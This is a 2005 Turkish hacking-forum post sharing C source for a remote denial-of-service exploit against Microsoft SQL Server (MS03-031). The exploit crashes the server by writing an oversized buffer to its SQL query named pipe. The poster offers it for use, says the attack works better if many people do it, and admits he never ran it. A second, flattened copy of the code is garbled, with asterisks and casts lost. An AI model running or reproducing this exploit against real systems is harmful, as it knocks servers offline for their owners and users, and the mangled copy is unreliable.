Artik Exploİte BaŞlayalim

**jackal** · 09-01-2005, 08:35 AM

Microsoft Sql Server Dos Atak Exploiti

Adından da anlaşıldığı gibi
SQL servere gereksiz sorgular göndererek yavaşlamasına sebep olabilir.
çok kişinin yapması daha iyi olur.

not: çalıştırmayı denemedim.
buyrun kod

////////////////////////////////////////////////////////////////
//
// Microsoft SQL Server DoS Remote Exploit (MS03-031)
// By refdom of xfocus
//
////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void Usage()
{
printf("****************************************** \n");
printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
printf("\t Written by Refdom\n");
printf("\t Email: refdom xfocus org\n");
printf("\t Homepage: www.xfocus.org\n\n");
printf("Usage: DOSMSSQL.exe server buffersize\n");
printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
printf("The buffersize depends on service pack level.\n");
printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
printf("when buffersize is 9000, the server can be crashed.\n");
printf("\n");
printf("****************************************** *\n\n");
}

int main(int argc, char* argv[])
{
char lpPipeName[50];
char *lpBuffer = NULL;
unsigned long ulSize = 0;

BOOL bResult;
DWORD dwWritten = 0, dwMode;
HANDLE hPipe;

Usage();

printf("Starting...\n");

if (argc != 3)
goto Exit0;

if (strlen(argv[1]) < 20)
{
sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
}
else
{
printf("Error!server\n");
goto Exit0;
}

ulSize= atol(argv[2]);

lpBuffer = (char*)malloc(ulSize + 2);
if (NULL == lpBuffer)
{
printf("malloc error!\n");
goto Exit0;
}

memset(lpBuffer, 0, ulSize + 2);
memset(lpBuffer, 'A', ulSize);
*lpBuffer = '\x12';
*(lpBuffer + 1) = '\x01';
*(lpBuffer + 2) = '\x00';

printf("Connecting Server...\n");

hPipe = CreateFile(lpPipeName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (INVALID_HANDLE_VALUE == hPipe)
{
printf("Error!Connect server!%d\n", GetLastError());
goto Exit0;
}

dwMode = PIPE_READMODE_MESSAGE;
bResult = SetNamedPipeHandleState(
hPipe, // pipe handle
&dwMode, // new pipe mode
NULL, // don't set maximum bytes
NULL); // don't set maximum time
if (!bResult)
{
printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
goto Exit0;
}

bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

if (!bResult)
{
printf("\n\tError!WriteFile.%d\n\n", GetLastError());
printf("When see the error message, the target may be crashed!!\n\n");
goto Exit0;
}

Exit0:

return 0;
}

09-01-2005, 08:35 AM	#1
jackal Geçerken Uğradım Üyelik Tarihi: Aug 2005 Mesajlar: 99 Teşekkür Etme: 1 Thanked 50 Times in 23 Posts Üye No: 5 İtibar Gücü: 1504 Rep Puanı : 2460 Rep Derecesi : Cinsiyet :	Ynt: Artik Exploİte BaŞlayalim Microsoft Sql Server Dos Atak Exploiti Adından da anlaşıldığı gibi SQL servere gereksiz sorgular göndererek yavaşlamasına sebep olabilir. çok kişinin yapması daha iyi olur. not: çalıştırmayı denemedim. buyrun kod //////////////////////////////////////////////////////////////// // // Microsoft SQL Server DoS Remote Exploit (MS03-031) // By refdom of xfocus // //////////////////////////////////////////////////////////////// #include <stdio.h> #include <stdlib.h> #include <windows.h> void Usage() { printf("**************************************** \n"); printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n"); printf("\t Written by Refdom\n"); printf("\t Email: refdom xfocus org\n"); printf("\t Homepage: www.xfocus.org\n\n"); printf("Usage: DOSMSSQL.exe server buffersize\n"); printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n"); printf("The buffersize depends on service pack level.\n"); printf("I test it on my server: windows 2000, mssqlserver no sp.\n"); printf("when buffersize is 9000, the server can be crashed.\n"); printf("\n"); printf("**************************************** \n\n"); } int main(int argc, char argv[]) { char lpPipeName[50]; char lpBuffer = NULL; unsigned long ulSize = 0; BOOL bResult; DWORD dwWritten = 0, dwMode; HANDLE hPipe; Usage(); printf("Starting...\n"); if (argc != 3) goto Exit0; if (strlen(argv[1]) < 20) { sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]); } else { printf("Error!server\n"); goto Exit0; } ulSize= atol(argv[2]); lpBuffer = (char)malloc(ulSize + 2); if (NULL == lpBuffer) { printf("malloc error!\n"); goto Exit0; } memset(lpBuffer, 0, ulSize + 2); memset(lpBuffer, 'A', ulSize); lpBuffer = '\x12'; (lpBuffer + 1) = '\x01'; *(lpBuffer + 2) = '\x00'; printf("Connecting Server...\n"); hPipe = CreateFile(lpPipeName, GENERIC_READ \| GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (INVALID_HANDLE_VALUE == hPipe) { printf("Error!Connect server!%d\n", GetLastError()); goto Exit0; } dwMode = PIPE_READMODE_MESSAGE; bResult = SetNamedPipeHandleState( hPipe, // pipe handle &dwMode, // new pipe mode NULL, // don't set maximum bytes NULL); // don't set maximum time if (!bResult) { printf("Error!SetNamedPipeHandleState.%d\n", GetLastError()); goto Exit0; } bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL); if (!bResult) { printf("\n\tError!WriteFile.%d\n\n", GetLastError()); printf("When see the error message, the target may be crashed!!\n\n"); goto Exit0; } Exit0: return 0; }

Konu Araçları
Yazdırılabilir Sürümü Göster Sayfayı E-Postayla Gönder
Görünüm Modları
Normal Görünüme Geç Hibrit Mod Switch to Threaded Mode

Benzer Konular
Konu	Konuyu Başlatan	Forum	Cevaplar	Son Mesaj
Artik gel...	WrAtBoY	Eskiler (Arşiv)	0	02-09-2008 12:28 PM
Artik Gİt Gİdebİlİrsen	GooD aNd EvıL	Eskiler (Arşiv)	0	10-28-2007 10:07 AM
Artik Gİt	F@sTaLaFisT@	Eskiler (Arşiv)	0	10-10-2007 12:53 PM
YoK artIK..	puMa	Eskiler (Arşiv)	5	05-01-2007 10:04 AM
Artik cok gec ...	aLeMDaR	Eskiler (Arşiv)	0	08-30-2006 01:17 AM

Konuyu Görüntüleyen Aktif Kullanıcılar: 1 (0 üye ve 1 misafir)